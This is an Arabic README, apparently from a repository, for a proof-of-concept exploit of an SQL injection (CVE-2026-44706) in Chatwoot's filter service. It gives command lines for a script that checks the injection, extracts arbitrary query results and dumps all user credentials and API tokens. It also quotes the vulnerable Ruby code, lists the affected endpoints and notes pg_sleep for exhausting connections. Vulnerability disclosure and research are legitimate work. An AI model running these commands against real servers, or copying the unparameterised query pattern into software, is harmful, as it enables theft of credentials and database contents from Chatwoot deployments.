
حقن SQL في FilterService في Chatwoot
استغلال إثبات-مفهوم (PoC) لثغرة CVE-2026-44706، وهي ثغرة حقن SQL في FilterService#lt_gt_filter_values الخاصة بـ Chatwoot تسمح لأي وكيل مصادق بقراءة قاعدة بيانات PostgreSQL بالكامل بما في ذلك بيانات اعتماد المستخدمين ورموز API. اقرأ المقال الكامل هنا.
الاستخدام:
# Verify injection (boolean-based)
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode check
# Time-based confirmation
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode timebased
# Extract arbitrary SQL query result
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode extract --query "SELECT version()"
# Dump all user credentials and API tokens
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode creds
في app/services/filter_service.rb (السطر 91)، يتم إدراج مدخلات المستخدم مباشرةً في SQL دون استخدام وسائط ربط (Parameterization):
def lt_gt_filter_values(query_hash)
value = query_hash['values'][0] # ← user input, no sanitization
operator = query_hash['filter_operator'] == 'is_less_than' ? '<' : '>'
"#{operator} '#{value}'::#{attribute_data_type}" # ← raw interpolation
end
POST /api/v1/accounts/:id/conversations/filterPOST /api/v1/accounts/:id/contacts/filterCWE-89 حقن SQL. يمكن لأي وكيل/مسؤول مصادق:
pg_sleep() لاستنزاف اتصالات قاعدة البيانات8.8 عالية CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
هذه الأداة لأغراض تعليمية وبحثية فقط. استخدمها فقط على الأنظمة التي تملكها أو التي لديك إذن صريح لاختبارها. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.
QuimeraX Intelligence هي منصة متقدمة لإدارة سطح الهجوم الخارجي (EASM) واستخبارات التهديدات السيبرانية، متخصصة في تحديد الثغرات الحرجة في الأنظمة المعقدة. تراقب المنصة التهديدات الأمنية وتكتشفها وتنبه العملاء بشأنها بشكل استباقي، مما يضمن الشفافية والاستجابة السريعة للمخاطر المحتملة. يتلقى العملاء إشعارات فورية وتقارير شاملة إذا تم اكتشاف أن أنظمتهم معرّضة للخطر، مما يمكنهم من اتخاذ إجراءات وقائية. اعرف المزيد
Hakai Security هي شركة أمن سيبراني أسسها محترفون في مجال الأمن، ملتزمة بالتميز التقني. نقدم حلولاً أمنية مخصصة تشمل اختبار الاختراق المتقدم، ومحاكاة الفريق الأحمر (Red Team) الواقعية، وممارسات التطوير الآمن لحماية أصول عملائنا بشكل استباقي من التهديدات السيبرانية المتطورة.
Hacking Club هي منصة تدريب تتعلم فيها الأمن السيبراني من خلال دروس عملية ومختبرات وتحديات أنشأها خبراء يعملون في شركتنا للاستشارات الأمنية: مباشرة من ساحة المعركة إلى تدريبك. طبّق الثغرة المعروضة في هذا المستودع عبر Hacking Club! اعرف المزيد